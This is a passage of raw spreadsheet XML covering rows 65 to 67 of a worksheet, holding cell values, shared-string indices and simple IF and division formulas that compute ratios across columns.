      <c r="IJ65" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK65" s="99">
        <v>260.0</v>
      </c>
      <c r="IL65" s="99">
        <v>236.0</v>
      </c>
      <c r="IM65" s="121">
        <f t="shared" si="97"/>
        <v>236</v>
      </c>
      <c r="IN65" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO65" s="98">
        <v>236.0</v>
      </c>
      <c r="IP65" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ65" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR65" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS65" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT65" s="127"/>
      <c r="IU65" s="127"/>
      <c r="IV65" s="127"/>
      <c r="IW65" s="127"/>
      <c r="IX65" s="127"/>
      <c r="IY65" s="127"/>
      <c r="IZ65" s="127"/>
      <c r="JA65" s="127"/>
      <c r="JB65" s="127"/>
      <c r="JC65" s="127"/>
      <c r="JD65" s="127"/>
      <c r="JE65" s="127"/>
      <c r="JF65" s="127"/>
      <c r="JG65" s="127"/>
      <c r="JH65" s="127"/>
      <c r="JI65" s="127"/>
      <c r="JJ65" s="127"/>
      <c r="JK65" s="127"/>
      <c r="JL65" s="127"/>
      <c r="JM65" s="127"/>
      <c r="JN65" s="127"/>
      <c r="JO65" s="127"/>
      <c r="JP65" s="127"/>
      <c r="JQ65" s="127"/>
      <c r="JR65" s="127"/>
      <c r="JS65" s="127"/>
      <c r="JT65" s="127"/>
      <c r="JU65" s="127"/>
      <c r="JV65" s="127"/>
      <c r="JW65" s="127"/>
      <c r="JX65" s="127"/>
      <c r="JY65" s="127"/>
      <c r="JZ65" s="127"/>
      <c r="KA65" s="127"/>
      <c r="KB65" s="127"/>
      <c r="KC65" s="127"/>
      <c r="KD65" s="127"/>
      <c r="KE65" s="127"/>
      <c r="KF65" s="127"/>
      <c r="KG65" s="127"/>
      <c r="KH65" s="127"/>
      <c r="KI65" s="127"/>
      <c r="KJ65" s="127"/>
      <c r="KK65" s="127"/>
      <c r="KL65" s="127"/>
      <c r="KM65" s="127"/>
      <c r="KN65" s="127"/>
      <c r="KO65" s="127"/>
      <c r="KP65" s="127"/>
      <c r="KQ65" s="127"/>
      <c r="KR65" s="127"/>
      <c r="KS65" s="127"/>
      <c r="KT65" s="127"/>
      <c r="KU65" s="127"/>
      <c r="KV65" s="127"/>
      <c r="KW65" s="127"/>
      <c r="KX65" s="127"/>
      <c r="KY65" s="127"/>
      <c r="KZ65" s="127"/>
      <c r="LA65" s="127"/>
      <c r="LB65" s="127"/>
      <c r="LC65" s="127"/>
      <c r="LD65" s="127"/>
      <c r="LE65" s="127"/>
      <c r="LF65" s="127"/>
      <c r="LG65" s="127"/>
      <c r="LH65" s="127"/>
      <c r="LI65" s="127"/>
      <c r="LJ65" s="127"/>
      <c r="LK65" s="127"/>
      <c r="LL65" s="127"/>
      <c r="LM65" s="127"/>
      <c r="LN65" s="127"/>
      <c r="LO65" s="127"/>
      <c r="LP65" s="127"/>
      <c r="LQ65" s="127"/>
      <c r="LR65" s="127"/>
      <c r="LS65" s="127"/>
      <c r="LT65" s="127"/>
      <c r="LU65" s="127"/>
      <c r="LV65" s="127"/>
      <c r="LW65" s="127"/>
      <c r="LX65" s="127"/>
      <c r="LY65" s="127"/>
      <c r="LZ65" s="127"/>
      <c r="MA65" s="127"/>
      <c r="MB65" s="127"/>
      <c r="MC65" s="127"/>
      <c r="MD65" s="127"/>
      <c r="ME65" s="127"/>
      <c r="MF65" s="127"/>
      <c r="MG65" s="127"/>
      <c r="MH65" s="127"/>
      <c r="MI65" s="127"/>
      <c r="MJ65" s="127"/>
      <c r="MK65" s="127"/>
      <c r="ML65" s="127"/>
      <c r="MM65" s="127"/>
      <c r="MN65" s="127"/>
      <c r="MO65" s="127"/>
      <c r="MP65" s="127"/>
      <c r="MQ65" s="127"/>
      <c r="MR65" s="127"/>
      <c r="MS65" s="127"/>
      <c r="MT65" s="127"/>
      <c r="MU65" s="127"/>
      <c r="MV65" s="127"/>
      <c r="MW65" s="127"/>
      <c r="MX65" s="127"/>
      <c r="MY65" s="127"/>
      <c r="MZ65" s="127"/>
      <c r="NA65" s="127"/>
      <c r="NB65" s="127"/>
      <c r="NC65" s="127"/>
      <c r="ND65" s="127"/>
      <c r="NE65" s="127"/>
      <c r="NF65" s="127"/>
      <c r="NG65" s="127"/>
      <c r="NH65" s="127"/>
      <c r="NI65" s="127"/>
      <c r="NJ65" s="127"/>
      <c r="NK65" s="127"/>
      <c r="NL65" s="127"/>
      <c r="NM65" s="127"/>
      <c r="NN65" s="127"/>
      <c r="NO65" s="127"/>
      <c r="NP65" s="127"/>
      <c r="NQ65" s="127"/>
      <c r="NR65" s="127"/>
      <c r="NS65" s="127"/>
      <c r="NT65" s="127"/>
      <c r="NU65" s="127"/>
      <c r="NV65" s="127"/>
      <c r="NW65" s="127"/>
      <c r="NX65" s="127"/>
      <c r="NY65" s="127"/>
    </row>
    <row r="66" ht="153.75" customHeight="1">
      <c r="B66" s="89" t="s">
        <v>427</v>
      </c>
      <c r="C66" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D66" s="90" t="s">
        <v>428</v>
      </c>
      <c r="E66" s="90" t="s">
        <v>1282</v>
      </c>
      <c r="F66" s="90" t="s">
        <v>1283</v>
      </c>
      <c r="G66" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H66" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I66" s="92" t="s">
        <v>1042</v>
      </c>
      <c r="J66" s="92" t="s">
        <v>1062</v>
      </c>
      <c r="K66" s="92" t="s">
        <v>1284</v>
      </c>
      <c r="L66" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M66" s="93">
        <v>1.0</v>
      </c>
      <c r="N66" s="93">
        <v>1.0</v>
      </c>
      <c r="O66" s="93">
        <v>0.0</v>
      </c>
      <c r="P66" s="93">
        <v>1.0</v>
      </c>
      <c r="Q66" s="93">
        <f t="shared" si="103"/>
        <v>1</v>
      </c>
      <c r="R66" s="93">
        <v>1.0</v>
      </c>
      <c r="S66" s="93">
        <v>0.0</v>
      </c>
      <c r="T66" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U66" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V66" s="126" t="s">
        <v>1285</v>
      </c>
      <c r="W66" s="96" t="s">
        <v>1286</v>
      </c>
      <c r="X66" s="97" t="s">
        <v>1287</v>
      </c>
      <c r="Y66" s="96" t="s">
        <v>1288</v>
      </c>
      <c r="Z66" s="96" t="s">
        <v>1289</v>
      </c>
      <c r="AA66" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB66" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC66" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD66" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE66" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF66" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG66" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH66" s="99" t="s">
        <v>1047</v>
      </c>
      <c r="AI66" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ66" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK66" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL66" s="100">
        <v>0.0</v>
      </c>
      <c r="AM66" s="100">
        <v>0.0</v>
      </c>
      <c r="AN66" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO66" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP66" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ66" s="100">
        <v>0.0</v>
      </c>
      <c r="AR66" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS66" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT66" s="100" t="str">
        <f t="shared" ref="AT66:AT67" si="111">IF(AR66="-",AS66,AR66)</f>
        <v>-</v>
      </c>
      <c r="AU66" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV66" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW66" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX66" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY66" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ66" s="100">
        <v>0.0</v>
      </c>
      <c r="BA66" s="102">
        <v>1.0</v>
      </c>
      <c r="BB66" s="102">
        <v>0.0</v>
      </c>
      <c r="BC66" s="102">
        <v>0.0</v>
      </c>
      <c r="BD66" s="102">
        <v>0.0</v>
      </c>
      <c r="BE66" s="102">
        <v>0.0</v>
      </c>
      <c r="BF66" s="102">
        <v>0.0</v>
      </c>
      <c r="BG66" s="102">
        <v>0.0</v>
      </c>
      <c r="BH66" s="102">
        <v>0.0</v>
      </c>
      <c r="BI66" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ66" s="102">
        <v>0.0</v>
      </c>
      <c r="BK66" s="102">
        <v>0.0</v>
      </c>
      <c r="BL66" s="103">
        <f>BB66/N69</f>
        <v>0</v>
      </c>
      <c r="BM66" s="103">
        <f>BI66/N69</f>
        <v>0</v>
      </c>
      <c r="BN66" s="103">
        <f>IF(BE66="-","-",BE66/N69)</f>
        <v>0</v>
      </c>
      <c r="BO66" s="103">
        <f>BC66/P69</f>
        <v>0</v>
      </c>
      <c r="BP66" s="103">
        <f>BJ66/P69</f>
        <v>0</v>
      </c>
      <c r="BQ66" s="103">
        <f>IF(BG66="-","-",BG66/P69)</f>
        <v>0</v>
      </c>
      <c r="BR66" s="103">
        <f>BD66/R69</f>
        <v>0</v>
      </c>
      <c r="BS66" s="103">
        <f>BK66/R69</f>
        <v>0</v>
      </c>
      <c r="BT66" s="103">
        <f>IF(BH66="-","-",BH66/R69)</f>
        <v>0</v>
      </c>
      <c r="BU66" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV66" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW66" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX66" s="104">
        <v>0.0</v>
      </c>
      <c r="BY66" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ66" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA66" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB66" s="104">
        <v>0.0</v>
      </c>
      <c r="CC66" s="104">
        <v>0.0</v>
      </c>
      <c r="CD66" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE66" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF66" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CG66" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH66" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI66" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ66" s="129" t="s">
        <v>12</v>
      </c>
      <c r="CK66" s="104">
        <v>0.0</v>
      </c>
      <c r="CL66" s="104">
        <v>0.0</v>
      </c>
      <c r="CM66" s="105">
        <v>1.0</v>
      </c>
      <c r="CN66" s="105">
        <v>0.0</v>
      </c>
      <c r="CO66" s="105">
        <v>0.0</v>
      </c>
      <c r="CP66" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ66" s="105">
        <v>0.0</v>
      </c>
      <c r="CR66" s="105">
        <v>0.0</v>
      </c>
      <c r="CS66" s="105">
        <v>0.0</v>
      </c>
      <c r="CT66" s="105">
        <v>0.0</v>
      </c>
      <c r="CU66" s="105">
        <v>0.0</v>
      </c>
      <c r="CV66" s="105">
        <v>0.0</v>
      </c>
      <c r="CW66" s="105">
        <v>0.0</v>
      </c>
      <c r="CX66" s="105">
        <v>0.0</v>
      </c>
      <c r="CY66" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ66" s="105">
        <v>0.0</v>
      </c>
      <c r="DA66" s="105">
        <v>0.0</v>
      </c>
      <c r="DB66" s="106">
        <f>CN66/N69</f>
        <v>0</v>
      </c>
      <c r="DC66" s="106">
        <f>CW66/N69</f>
        <v>0</v>
      </c>
      <c r="DD66" s="106">
        <f>IF(CS66="-","-",CS66/N69)</f>
        <v>0</v>
      </c>
      <c r="DE66" s="106">
        <f>CO66/P69</f>
        <v>0</v>
      </c>
      <c r="DF66" s="106">
        <f>CX66/P69</f>
        <v>0</v>
      </c>
      <c r="DG66" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH66" s="106">
        <f>IF(CR66="-","-",CR66/R69)</f>
        <v>0</v>
      </c>
      <c r="DI66" s="106">
        <f>IF(DA66="-","-",DA66/R69)</f>
        <v>0</v>
      </c>
      <c r="DJ66" s="106">
        <f>IF(CV66="-","-",CV66/R69)</f>
        <v>0</v>
      </c>
      <c r="DK66" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL66" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM66" s="108">
        <v>50447.0</v>
      </c>
      <c r="DN66" s="108">
        <v>1.0</v>
      </c>
      <c r="DO66" s="108">
        <v>2.0</v>
      </c>
      <c r="DP66" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ66" s="108">
        <v>50447.0</v>
      </c>
      <c r="DR66" s="108">
        <v>1.0</v>
      </c>
      <c r="DS66" s="108">
        <v>2.0</v>
      </c>
      <c r="DT66" s="108">
        <v>50447.0</v>
      </c>
      <c r="DU66" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV66" s="108">
        <f t="shared" si="91"/>
        <v>50447</v>
      </c>
      <c r="DW66" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX66" s="108">
        <v>50447.0</v>
      </c>
      <c r="DY66" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ66" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA66" s="108">
        <v>0.0</v>
      </c>
      <c r="EB66" s="108">
        <v>0.0</v>
      </c>
      <c r="EC66" s="109">
        <v>1.0</v>
      </c>
      <c r="ED66" s="109">
        <v>0.0</v>
      </c>
      <c r="EE66" s="109">
        <v>1.0</v>
      </c>
      <c r="EF66" s="109">
        <v>2.0</v>
      </c>
      <c r="EG66" s="109">
        <v>0.0</v>
      </c>
      <c r="EH66" s="109">
        <v>2.0</v>
      </c>
      <c r="EI66" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ66" s="109">
        <v>0.0</v>
      </c>
      <c r="EK66" s="109">
        <v>0.0</v>
      </c>
      <c r="EL66" s="109">
        <v>0.0</v>
      </c>
      <c r="EM66" s="109">
        <v>0.0</v>
      </c>
      <c r="EN66" s="109">
        <v>1.0</v>
      </c>
      <c r="EO66" s="109">
        <v>2.0</v>
      </c>
      <c r="EP66" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ66" s="109">
        <v>2.0</v>
      </c>
      <c r="ER66" s="110">
        <f>ED66/N69</f>
        <v>0</v>
      </c>
      <c r="ES66" s="110">
        <f>EM66/N69</f>
        <v>0</v>
      </c>
      <c r="ET66" s="110">
        <f>IF(EI66="-","-",EI66/N69)</f>
        <v>0</v>
      </c>
      <c r="EU66" s="110">
        <f>EE66/P69</f>
        <v>0.125</v>
      </c>
      <c r="EV66" s="110">
        <f>EN66/P69</f>
        <v>0.125</v>
      </c>
      <c r="EW66" s="110">
        <f>IF(EK66="-","-",EK66/P69)</f>
        <v>0</v>
      </c>
      <c r="EX66" s="110">
        <f>IF(EH66="-","-",EH66/R69)</f>
        <v>0.25</v>
      </c>
      <c r="EY66" s="110">
        <f>IF(EQ66="-","-",EQ66/R69)</f>
        <v>0.25</v>
      </c>
      <c r="EZ66" s="110">
        <f>IF(EL66="-","-",EL66/R69)</f>
        <v>0</v>
      </c>
      <c r="FA66" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB66" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC66" s="111" t="s">
        <v>1290</v>
      </c>
      <c r="FD66" s="111">
        <v>3.0</v>
      </c>
      <c r="FE66" s="111">
        <v>6.0</v>
      </c>
      <c r="FF66" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG66" s="111">
        <v>50447.0</v>
      </c>
      <c r="FH66" s="111">
        <v>1.0</v>
      </c>
      <c r="FI66" s="111">
        <v>2.0</v>
      </c>
      <c r="FJ66" s="111" t="s">
        <v>1291</v>
      </c>
      <c r="FK66" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL66" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749, 50447</v>
      </c>
      <c r="FM66" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN66" s="111" t="s">
        <v>1292</v>
      </c>
      <c r="FO66" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP66" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ66" s="111">
        <v>0.0</v>
      </c>
      <c r="FR66" s="111">
        <v>0.0</v>
      </c>
      <c r="FS66" s="112">
        <v>1.0</v>
      </c>
      <c r="FT66" s="112">
        <v>1.0</v>
      </c>
      <c r="FU66" s="112">
        <v>3.0</v>
      </c>
      <c r="FV66" s="112">
        <v>2.0</v>
      </c>
      <c r="FW66" s="112">
        <v>4.0</v>
      </c>
      <c r="FX66" s="112">
        <v>6.0</v>
      </c>
      <c r="FY66" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ66" s="112">
        <v>0.0</v>
      </c>
      <c r="GA66" s="112">
        <v>0.0</v>
      </c>
      <c r="GB66" s="112">
        <v>0.0</v>
      </c>
      <c r="GC66" s="112">
        <v>0.0</v>
      </c>
      <c r="GD66" s="112">
        <v>1.0</v>
      </c>
      <c r="GE66" s="112">
        <v>2.0</v>
      </c>
      <c r="GF66" s="112">
        <v>0.0</v>
      </c>
      <c r="GG66" s="112">
        <v>2.0</v>
      </c>
      <c r="GH66" s="113">
        <f>FT66/N69</f>
        <v>1</v>
      </c>
      <c r="GI66" s="113">
        <f>GC66/N69</f>
        <v>0</v>
      </c>
      <c r="GJ66" s="113">
        <f>IF(FY66="-","-",FY66/N69)</f>
        <v>0</v>
      </c>
      <c r="GK66" s="113">
        <f>FU66/P69</f>
        <v>0.375</v>
      </c>
      <c r="GL66" s="113">
        <f>GD66/P69</f>
        <v>0.125</v>
      </c>
      <c r="GM66" s="113">
        <f>IF(GA66="-","-",GA66/P69)</f>
        <v>0</v>
      </c>
      <c r="GN66" s="113">
        <f>IF(FX66="-","-",FX66/R69)</f>
        <v>0.75</v>
      </c>
      <c r="GO66" s="113">
        <f>IF(GG66="-","-",GG66/R69)</f>
        <v>0.25</v>
      </c>
      <c r="GP66" s="113">
        <f>IF(GB66="-","-",GB66/R69)</f>
        <v>0</v>
      </c>
      <c r="GQ66" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR66" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS66" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT66" s="94"/>
      <c r="GU66" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV66" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW66" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX66" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY66" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ66" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA66" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB66" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC66" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD66" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE66" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF66" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG66" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH66" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI66" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ66" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK66" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL66" s="93">
        <v>0.0</v>
      </c>
      <c r="HM66" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN66" s="93">
        <v>0.0</v>
      </c>
      <c r="HO66" s="93">
        <v>0.0</v>
      </c>
      <c r="HP66" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ66" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR66" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS66" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT66" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU66" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV66" s="119">
        <v>9999.0</v>
      </c>
      <c r="HW66" s="119">
        <v>1.0</v>
      </c>
      <c r="HX66" s="119">
        <v>2.0</v>
      </c>
      <c r="HY66" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ66" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA66" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB66" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC66" s="120" t="s">
        <v>12</v>
      </c>
      <c r="ID66" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE66" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF66" s="120">
        <v>9999.0</v>
      </c>
      <c r="IG66" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH66" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II66" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ66" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK66" s="99">
        <v>1.0</v>
      </c>
      <c r="IL66" s="99">
        <v>0.0</v>
      </c>
      <c r="IM66" s="121">
        <f t="shared" si="97"/>
        <v>0</v>
      </c>
      <c r="IN66" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO66" s="98">
        <v>0.0</v>
      </c>
      <c r="IP66" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ66" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR66" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS66" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT66" s="127"/>
      <c r="IU66" s="127"/>
      <c r="IV66" s="127"/>
      <c r="IW66" s="127"/>
      <c r="IX66" s="127"/>
      <c r="IY66" s="127"/>
      <c r="IZ66" s="127"/>
      <c r="JA66" s="127"/>
      <c r="JB66" s="127"/>
      <c r="JC66" s="127"/>
      <c r="JD66" s="127"/>
      <c r="JE66" s="127"/>
      <c r="JF66" s="127"/>
      <c r="JG66" s="127"/>
      <c r="JH66" s="127"/>
      <c r="JI66" s="127"/>
      <c r="JJ66" s="127"/>
      <c r="JK66" s="127"/>
      <c r="JL66" s="127"/>
      <c r="JM66" s="127"/>
      <c r="JN66" s="127"/>
      <c r="JO66" s="127"/>
      <c r="JP66" s="127"/>
      <c r="JQ66" s="127"/>
      <c r="JR66" s="127"/>
      <c r="JS66" s="127"/>
      <c r="JT66" s="127"/>
      <c r="JU66" s="127"/>
      <c r="JV66" s="127"/>
      <c r="JW66" s="127"/>
      <c r="JX66" s="127"/>
      <c r="JY66" s="127"/>
      <c r="JZ66" s="127"/>
      <c r="KA66" s="127"/>
      <c r="KB66" s="127"/>
      <c r="KC66" s="127"/>
      <c r="KD66" s="127"/>
      <c r="KE66" s="127"/>
      <c r="KF66" s="127"/>
      <c r="KG66" s="127"/>
      <c r="KH66" s="127"/>
      <c r="KI66" s="127"/>
      <c r="KJ66" s="127"/>
      <c r="KK66" s="127"/>
      <c r="KL66" s="127"/>
      <c r="KM66" s="127"/>
      <c r="KN66" s="127"/>
      <c r="KO66" s="127"/>
      <c r="KP66" s="127"/>
      <c r="KQ66" s="127"/>
      <c r="KR66" s="127"/>
      <c r="KS66" s="127"/>
      <c r="KT66" s="127"/>
      <c r="KU66" s="127"/>
      <c r="KV66" s="127"/>
      <c r="KW66" s="127"/>
      <c r="KX66" s="127"/>
      <c r="KY66" s="127"/>
      <c r="KZ66" s="127"/>
      <c r="LA66" s="127"/>
      <c r="LB66" s="127"/>
      <c r="LC66" s="127"/>
      <c r="LD66" s="127"/>
      <c r="LE66" s="127"/>
      <c r="LF66" s="127"/>
      <c r="LG66" s="127"/>
      <c r="LH66" s="127"/>
      <c r="LI66" s="127"/>
      <c r="LJ66" s="127"/>
      <c r="LK66" s="127"/>
      <c r="LL66" s="127"/>
      <c r="LM66" s="127"/>
      <c r="LN66" s="127"/>
      <c r="LO66" s="127"/>
      <c r="LP66" s="127"/>
      <c r="LQ66" s="127"/>
      <c r="LR66" s="127"/>
      <c r="LS66" s="127"/>
      <c r="LT66" s="127"/>
      <c r="LU66" s="127"/>
      <c r="LV66" s="127"/>
      <c r="LW66" s="127"/>
      <c r="LX66" s="127"/>
      <c r="LY66" s="127"/>
      <c r="LZ66" s="127"/>
      <c r="MA66" s="127"/>
      <c r="MB66" s="127"/>
      <c r="MC66" s="127"/>
      <c r="MD66" s="127"/>
      <c r="ME66" s="127"/>
      <c r="MF66" s="127"/>
      <c r="MG66" s="127"/>
      <c r="MH66" s="127"/>
      <c r="MI66" s="127"/>
      <c r="MJ66" s="127"/>
      <c r="MK66" s="127"/>
      <c r="ML66" s="127"/>
      <c r="MM66" s="127"/>
      <c r="MN66" s="127"/>
      <c r="MO66" s="127"/>
      <c r="MP66" s="127"/>
      <c r="MQ66" s="127"/>
      <c r="MR66" s="127"/>
      <c r="MS66" s="127"/>
      <c r="MT66" s="127"/>
      <c r="MU66" s="127"/>
      <c r="MV66" s="127"/>
      <c r="MW66" s="127"/>
      <c r="MX66" s="127"/>
      <c r="MY66" s="127"/>
      <c r="MZ66" s="127"/>
      <c r="NA66" s="127"/>
      <c r="NB66" s="127"/>
      <c r="NC66" s="127"/>
      <c r="ND66" s="127"/>
      <c r="NE66" s="127"/>
      <c r="NF66" s="127"/>
      <c r="NG66" s="127"/>
      <c r="NH66" s="127"/>
      <c r="NI66" s="127"/>
      <c r="NJ66" s="127"/>
      <c r="NK66" s="127"/>
      <c r="NL66" s="127"/>
      <c r="NM66" s="127"/>
      <c r="NN66" s="127"/>
      <c r="NO66" s="127"/>
      <c r="NP66" s="127"/>
      <c r="NQ66" s="127"/>
      <c r="NR66" s="127"/>
      <c r="NS66" s="127"/>
      <c r="NT66" s="127"/>
      <c r="NU66" s="127"/>
      <c r="NV66" s="127"/>
      <c r="NW66" s="127"/>
      <c r="NX66" s="127"/>
      <c r="NY66" s="127"/>
    </row>
    <row r="67" ht="153.75" customHeight="1">
      <c r="B67" s="89" t="s">
        <v>664</v>
      </c>
      <c r="C67" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D67" s="90" t="s">
        <v>665</v>
      </c>
      <c r="E67" s="90" t="s">
        <v>1293</v>
      </c>
      <c r="F67" s="90" t="s">
        <v>1294</v>
      </c>
      <c r="G67" s="91" t="s">
        <v>1295</v>
      </c>
      <c r="H67" s="90" t="s">
        <v>1296</v>
      </c>
      <c r="I67" s="92" t="s">
        <v>1297</v>
      </c>
      <c r="J67" s="92" t="s">
        <v>1298</v>
      </c>
      <c r="K67" s="92" t="s">
        <v>1299</v>
      </c>
      <c r="L67" s="93" t="s">
        <v>236</v>
      </c>
      <c r="M67" s="93">
        <v>2.0</v>
      </c>
      <c r="N67" s="93">
        <v>1.0</v>
      </c>
      <c r="O67" s="93">
        <v>0.0</v>
      </c>
      <c r="P67" s="93">
        <v>1.0</v>
      </c>
      <c r="Q67" s="93">
        <f t="shared" si="103"/>
        <v>1</v>
      </c>
      <c r="R67" s="93">
        <v>1.0</v>
      </c>
      <c r="S67" s="93">
        <v>0.0</v>
      </c>
      <c r="T67" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U67" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V67" s="126" t="s">
        <v>1300</v>
      </c>
      <c r="W67" s="96" t="s">
        <v>1301</v>
      </c>
      <c r="X67" s="97" t="s">
        <v>1302</v>
      </c>
      <c r="Y67" s="126" t="s">
        <v>1303</v>
      </c>
      <c r="Z67" s="96" t="s">
        <v>12</v>
      </c>
      <c r="AA67" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB67" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC67" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD67" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE67" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF67" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG67" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH67" s="99" t="s">
        <v>1304</v>
      </c>
      <c r="AI67" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ67" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK67" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL67" s="100">
        <v>0.0</v>
      </c>
      <c r="AM67" s="100">
        <v>0.0</v>
      </c>
      <c r="AN67" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO67" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP67" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ67" s="100">
        <v>0.0</v>
      </c>
      <c r="AR67" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS67" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT67" s="100" t="str">
